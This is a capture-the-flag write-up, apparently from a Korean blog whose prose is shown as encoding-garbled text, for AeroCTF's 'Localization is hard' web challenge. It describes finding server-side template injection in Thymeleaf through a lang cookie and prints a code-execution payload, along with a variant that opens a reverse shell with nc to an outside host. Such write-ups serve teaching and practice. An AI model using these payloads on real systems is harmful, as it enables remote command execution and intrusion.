AeroCTF - Localization is hard
[Localization is Hard]
We made a little cafe for all the ctfers to relax after the competition.
The website is available in russian and english.
Try to find the flag somewhere in /
ํ์ด์ง์ ์ ์ํ์ฌ ๊ธฐ๋ฅ์ ์ดํด๋ณด๋ฉด ๋ณ๋ค๋ฅธ ๊ธฐ๋ฅ์ ์๊ณ ์์ด, ๋ฌ์์์ด๋ก ๋ณ๊ฒฝํด์ฃผ๋ ๊ธฐ๋ฅ์ด์๋ค.
ํด๋น ๊ธฐ๋ฅ์ ์ฟ ํค ๊ฐ์ lang=en ๋๋ ru ๋ก ์ค์ ๋์ด ์ฒ๋ฆฌ๋๋ค.
GET / HTTP/1.1
Host: 151.236.114.211:7878
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.81
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://151.236.114.211:7878/
Accept-Encoding: gzip, deflate
Accept-Language: ko,en;q=0.9,en-US;q=0.8
Cookie: lang=en
Connection: close
Cookie๊ฐ ์ฌ์ฉ์ ์
๋ ฅ์ ๋ฐ๋ ๊ฑฐ์ ์ ์ผํ ๊ธฐ๋ฅ์ด๋ค.
lang ์ฟ ํค ๊ฐ์ ๋ณ์กฐํด๋ณด๋ ์๋์ ๊ฐ์ ์๋ต์ด ๋ฐ์ํ๋ค.
thymeleaf๋ผ๋ Template์์ exception์ด ๋ฐ์ํ์๋ค.
ํ๋ฒ SSTI์ชฝ์ผ๋ก ๋ฐฉํฅ์ ์ก์๋ณด๊ณ payload๋ฅผ ํ
์คํธ ํด๋ณด์๋ค.
thymelaeaf SSTI Code Excecution ์ชฝ์ผ๋ก ๊ฒ์์ ํด๋ณด์๋ค.
Spring View Manipulation Vulnerability | Veracode
ํด๋น๊ธ์ code execution ํ ์ ์๋ payload๊ฐ ์๋ค.
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
ํ์ง๋ง ์ถ๋ ฅ๊ฐ์ ๋ฐ์๋ณผ ์ ๊ฐ์์ด์ nc๋ฅผ ํตํด ์ง์ ์ฐ๊ฒฐํ๋ ๋ฐฉ๋ฒ์ผ๋ก payload๋ฅผ ๋ณ๊ฒฝํด์ผํ๋ค.
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("nc ctf.heogi.com 8888 -e /bin/sh").getInputStream()).next()}__::.x
์ ์์ ์ผ๋ก ์ฐ๊ฒฐ์ด ๋์ด ํ์ผ์ ์ด์ด๋ณด๋ฉด ํ๋๊ทธ๊ฐ ๋์จ๋ค.
Aero{j4va_1s_better_th4n_engl1sh}
'๐Web' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
Web Server vs WAS(Web Application Server) (0) | 2023.09.29 |
---|---|
Broken API Authorization (0) | 2023.08.13 |
RCE via Server-Side Template Injection (0) | 2023.08.13 |
[KVE-2020-1616] ๊ทธ๋๋ณด๋ ๋ฉ์ธํ๋ฉด XSS ์ทจ์ฝ์ (0) | 2023.08.13 |
SSTI(Server Side Template Injection) (0) | 2022.01.29 |
๋๊ธ
์ด ๊ธ ๊ณต์ ํ๊ธฐ
-
๊ตฌ๋
ํ๊ธฐ
๊ตฌ๋ ํ๊ธฐ
-
์นด์นด์คํก
์นด์นด์คํก
-
๋ผ์ธ
๋ผ์ธ
-
ํธ์ํฐ
ํธ์ํฐ
-
Facebook
Facebook
-
์นด์นด์ค์คํ ๋ฆฌ
์นด์นด์ค์คํ ๋ฆฌ
-
๋ฐด๋
๋ฐด๋
-
๋ค์ด๋ฒ ๋ธ๋ก๊ทธ
๋ค์ด๋ฒ ๋ธ๋ก๊ทธ
-
Pocket
Pocket
-
Evernote
Evernote
๋ค๋ฅธ ๊ธ
-
Web Server vs WAS(Web Application Server)
Web Server vs WAS(Web Application Server)
2023.09.29 -
Broken API Authorization
Broken API Authorization
2023.08.13 -
RCE via Server-Side Template Injection
RCE via Server-Side Template Injection
2023.08.13 -
[KVE-2020-1616] ๊ทธ๋๋ณด๋ ๋ฉ์ธํ๋ฉด XSS ์ทจ์ฝ์
[KVE-2020-1616] ๊ทธ๋๋ณด๋ ๋ฉ์ธํ๋ฉด XSS ์ทจ์ฝ์
2023.08.13